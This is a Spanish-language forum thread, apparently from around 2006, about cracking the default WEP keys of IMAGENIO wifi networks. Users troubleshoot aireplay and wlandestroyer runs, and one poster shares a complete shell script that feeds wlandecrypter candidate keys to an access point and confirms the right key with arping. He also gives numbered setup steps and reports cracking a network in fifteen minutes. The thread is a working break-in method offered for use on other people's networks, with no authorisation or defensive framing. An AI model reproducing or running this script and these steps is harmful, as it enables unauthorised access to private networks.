 Autor
|
Tema: descifrar redes IMAGENIO sin clientes y sin paquetes ;) (Leído 46,724 veces)
|
ZariK
 Desconectado
Mensajes: 83
|
Tertulia me podria decir paso x paso q haces para hacerlo bien?? yo es q creo q no voy mal encaminado xo nunk doy cn la clave, nunk mejor dixo... Pliz ponme algun post dond expongas tus directrices, haber si asi x fin lo consigo.
Gracias. Saludos
P.D:uso una ipw2200 x si sirve de algo ^^
|
|
|
|
|
En línea
|
|
|
|
alrivas
Desconectado
Mensajes: 2
|
Hola a todos:
Mi problema es que en el momento que uso ./wlandestroyer en una consola, se me cuelga en la otra el aireplay -4.
Uso una pcmcia con chip ralink rt2500, quizás no permita hacer las dos cosas a la vez.
El caso es que he probado a ejecutar el wlandestroyer con la ralink y el aireplay con la wifi del portátil (ipw2200) y ahi no se me cuelga, pero no me captura ningún ARP. Las dos tarjetas están en modo monitor e iniciadas en el canal de la red.
Alguna idea??
Un saludo.
|
|
|
|
|
En línea
|
|
|
|
ZariK
Desconectado
Mensajes: 83
|
Me pasa lo mismo q a ti alrivas... quizas pueda ser x el arping q hay q cambiar el codigo del wlandestroyery dnd pone 192.168.1.1 cambiarlo por $3. haber si alguien no hexa una mano.
Gracias. Saludos
|
|
|
|
|
En línea
|
|
|
|
bienpiyao
Desconectado
Mensajes: 3
|
Buenas!! es genial el trabajo que haceis, me estoy iniciando en estos temas y aunque no me faltan ganas e ilusión, es mucho más fácil aprender si existen personas como ustedes...gracias!! Tengo una duda:
ejecuto el airodump y empieza a monitorizar paketes, en otra consola inicio el aireplay y se pone a leer paquetes, el siguiente paso era generar el archivo de claves, he aki mi duda. Tengo que parar el airodump o el airoplay para hacerlo?? abro una nueva consola?? el airoplay se para solo al terminar?? o se keda ahí hasta que lo pare?
Ahora mismo va por más de 9000 paquetes leidos con aireplay pero no sé si tengo que esperar o pararlo, o abrir otra consola. Espero ideas. Gracias.
ReSPeCT
|
|
|
|
|
En línea
|
|
|
|
tertulia
Desconectado
Mensajes: 219
|
Buenas!! es genial el trabajo que haceis, me estoy iniciando en estos temas y aunque no me faltan ganas e ilusión, es mucho más fácil aprender si existen personas como ustedes...gracias!! Tengo una duda:
ejecuto el airodump y empieza a monitorizar paketes, en otra consola inicio el aireplay y se pone a leer paquetes, el siguiente paso era generar el archivo de claves, he aki mi duda. Tengo que parar el airodump o el airoplay para hacerlo?? abro una nueva consola?? el airoplay se para solo al terminar?? o se keda ahí hasta que lo pare?
Ahora mismo va por más de 9000 paquetes leidos con aireplay pero no sé si tengo que esperar o pararlo, o abrir otra consola. Espero ideas. Gracias.
ReSPeCT
Extracto de la primera página: Cuando el script pase por la clave correcta el AP respondera con un arp y en la consola en la que esta el aireplay saldra un paquete, pulsais "y" para que se guarde y entonces el aireplay intentara hacer un chop-chop... pulsais Control+C para que no lo haga puesto que no nos interesa. Hacemos lo mismo en la consola donde esta el script para que no siga probando claves.
|
|
|
|
|
En línea
|
|
|
|
bienpiyao
Desconectado
Mensajes: 3
|
Buenas!! es genial el trabajo que haceis, me estoy iniciando en estos temas y aunque no me faltan ganas e ilusión, es mucho más fácil aprender si existen personas como ustedes...gracias!! Tengo una duda:
ejecuto el airodump y empieza a monitorizar paketes, en otra consola inicio el aireplay y se pone a leer paquetes, el siguiente paso era generar el archivo de claves, he aki mi duda. Tengo que parar el airodump o el airoplay para hacerlo?? abro una nueva consola?? el airoplay se para solo al terminar?? o se keda ahí hasta que lo pare?
Ahora mismo va por más de 9000 paquetes leidos con aireplay pero no sé si tengo que esperar o pararlo, o abrir otra consola. Espero ideas. Gracias.
ReSPeCT
Extracto de la primera página: Cuando el script pase por la clave correcta el AP respondera con un arp y en la consola en la que esta el aireplay saldra un paquete, pulsais "y" para que se guarde y entonces el aireplay intentara hacer un chop-chop... pulsais Control+C para que no lo haga puesto que no nos interesa. Hacemos lo mismo en la consola donde esta el script para que no siga probando claves.Creo que no has entendido mi pregunta, para poder hacer lo que dices, tengo que generar el archivo de claves, pero no sé si tengo que parar el aireplay o no para hacerlo o lo puedo hacer en otra consola a parte. Ahora mismo el aireplay lleva ya leidos 52.000 paquetes. Y es que no sé si para solo o lo tengo que parar, o esperar a que lea un determinado número de paquetes o que. ReSPeCT
|
|
|
|
|
En línea
|
|
|
|
cohone
Desconectado
Mensajes: 194
|
Tal vez os interese mi modificación del script. Te muestra directamente la clave sin necesidad de nada más que ejecutar el script. No se si ya se le ha ocurrido a alguien, supongo que sí, pero no me apetece leerme todo el post  lo único que necesitais es tener el wlandecrypter en el path o modificar la línea y poner la ruta completa. Como dato, acabo de petar una para probarlo y ha tardado 15min en sacarla probando 25350 keys. Bueno, si el ap está muy saturado, es posible que no reponda en los 10ms que le tengo puesto para que espere la respuesta arp. Nada, probadlo a ver que tal. #!/bin/sh
#
# ENTRADAS:
#
# $1 : Interfaz
# $2 : Essid
# $3 : AP
# $4 : Channel
#
if [ $# -lt 4 ]; then
echo "$0 '[Interfaz] [Essid] [AP] [Chan] '"
exit 1
fi
rm tmp.keys
wlandecrypter $3 $2 tmp.keys
iwconfig $1 mode managed
iwconfig $1 essid $2
iwconfig $1 ap $3
iwconfig $1 channel $4
iwconfig $1 key s:AAAAAAAAAAAAA
echo -n " * Esperando conexion: "
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -n "."
sleep 1;
done
echo " OK"
ifconfig $1 192.168.1.254
count=0
count_echo=0
for i in `cat tmp.keys`; do
iwconfig $1 key s:$i
while [ "$(iwconfig $1 2> /dev/null | grep Link | cut -d\= -f2 | cut -d \/ -f1)" = "0" ]; do
echo -en "\r * Conexion perdida, esperando..."
sleep 1;
done
arping2 -i$1 -c1 192.168.1.1 -w10000 > /dev/null 2>&1
if [ $? -eq 0 ]; then
echo -en "\nKey:"
echo $i
exit 0
fi
count=$((count+1))
count_echo=$((count_echo+1))
if [ $count_echo -ge 50 ]; then
echo -en "\r * Claves probadas: $count"
count_echo=0
fi
done
|
|
|
|
« Última modificación: 27 Octubre 2006, 00:20 por cohone »
|
En línea
|
|
|
|
tertulia
Desconectado
Mensajes: 219
|
Ahora, no no tienes que pararlo, abre otra ventana y lo generas/root/wlandestroy.sh ath0 WLAN_XX 00:XX:XX:XX:XX:XX 7 (suponiendo que sea canal 7) loquequieras.txt Salu2
|
|
|
|
|
En línea
|
|
|
|
alrivas
Desconectado
Mensajes: 2
|
Hola a todos:
Mi problema es que en el momento que uso ./wlandestroyer en una consola, se me cuelga en la otra el aireplay -4.
Uso una pcmcia con chip ralink rt2500, quizás no permita hacer las dos cosas a la vez.
El caso es que he probado a ejecutar el wlandestroyer con la ralink y el aireplay con la wifi del portátil (ipw2200) y ahi no se me cuelga, pero no me captura ningún ARP. Las dos tarjetas están en modo monitor e iniciadas en el canal de la red.
Alguna idea??
Un saludo.
Buenas de nuevo, he solucionado el problema adquiriendo una pcmcia con chipset Atheros. Perfecto a la primera. Así que para el que le sirva de ayuda, las tarjetas con chipset RALINK 2500, al menos, con los drivers de TROPPIX 1.2, no permite ejecutar a la vez el aireplay -4 y el script wlandestroy. Espero aclarar algo. Un saludo.
|
|
|
|
|
En línea
|
|
|
|
bienpiyao
Desconectado
Mensajes: 3
|
tertulia muchas gracias por la info, aunque ya me dí cuenta, porque me cansé de esperar y abrí otra consola y creé el archivo de claves jejeje, pero de todos modos, gracias!!.
ReSPeCT
|
|
|
|
|
En línea
|
|
|
|
ZariK
Desconectado
Mensajes: 83
|
cohone, podrias explicarme mejor tu técnica??? uso una ipw2200 y una atheros w108pcm x si ac falta... Cuales son los paso a seguir??
(paso a paso, q no soy muy experimentado) , es q cn el metodo de nilp0inter no e obtenido los resultados esperados (no conseguia el ARP). Uso el live cd de backtrack 2.0, lo digo x el tema del arping q en tu script lo tienes puesto cm arping2 y nose sin con backtrack funciona cn arping2 o arping a sekas...
Gracias. Saludos
P.D: si funciona tu método mil gracias y posterare los resultados, pliz dame los pasitos poko a poko para conseguirlo. :-)
|
|
|
|
|
En línea
|
|
|
|
usb_enabled
Desconectado
Mensajes: 436
COLLEJATOR
|
cohones k bien  osea k con tu script exactamente k necesitas? no necesitas generar archivo de claves ni el tinglao del airplay? mala epoca pa imagenio |
|
|
|
|
En línea
|
|
|
|
cohone
Desconectado
Mensajes: 194
|
cohones k bien smiley osea k con tu script exactamente k necesitas? no necesitas generar archivo de claves ni el tinglao del airplay? mala epoca pa imagenio El script es el mismo que el NilpOinter, solo he modificado lo que está en negrita. Le he puesto que te cree automáticamente el fichero de claves. Y he modificado el comando arping2 para que espere a recibir un arp(que para eso sirve el comando) durante 10ms. Después compruebo el valor que devuelve el comando,0 si responden al arp, en ese caso ya se la key, la que está utilizando en ese momento. cohone, podrias explicarme mejor tu técnica??? uso una ipw2200 y una atheros w108pcm x si ac falta... Cuales son los paso a seguir??
(paso a paso, q no soy muy experimentado) , es q cn el metodo de nilp0inter no e obtenido los resultados esperados (no conseguia el ARP). Uso el live cd de backtrack 2.0, lo digo x el tema del arping q en tu script lo tienes puesto cm arping2 y nose sin con backtrack funciona cn arping2 o arping a sekas...
Son similares a los de Nilp0int. 1. copias el script y lo pegas en un fichero (llamalo como te de la gana) 2. ejecutas chmod +x 'nombre de script' 3. Instalar el arping2 si no lo tienes 4. Instalar el wlandecrypter si no lo tienes Estos dos últimos ficheros deben estar en el PATH (se deben poder ejecutar desde cualquier directorio) 5. ejecutar el script con los parámetros de siempre script.sh [Interfaz] [Essid] [AP] [Chan] (ahora modifico el script para que no se necesite el parámetro [keys]) y el Interface se usa en modo managed (normal, no monitor)
|
|
|
|
|
En línea
|
|
|
|
cohone
Desconectado
Mensajes: 194
|
Uso el live cd de backtrack 2.0, lo digo x el tema del arping q en tu script lo tienes puesto cm arping2 y nose sin con backtrack funciona cn arping2 o arping a sekas... Creo que si funcionaría con arping en vez de con arping2 cambia arping2 -i$1 -c1 192.168.1.1 -w10000 > /dev/null 2>&1 por arping -I$1 -c1 -w10000 192.168.1.1 > /dev/null 2>&1
|
|
|
|
|
En línea
|
|
|
|
ZariK
Desconectado
Mensajes: 83
|
Graciass cohone!!!
Esta tarde lo prueba y te comento!!
Saludos.
|
|
|
|
|
En línea
|
|
|
|
|
 |
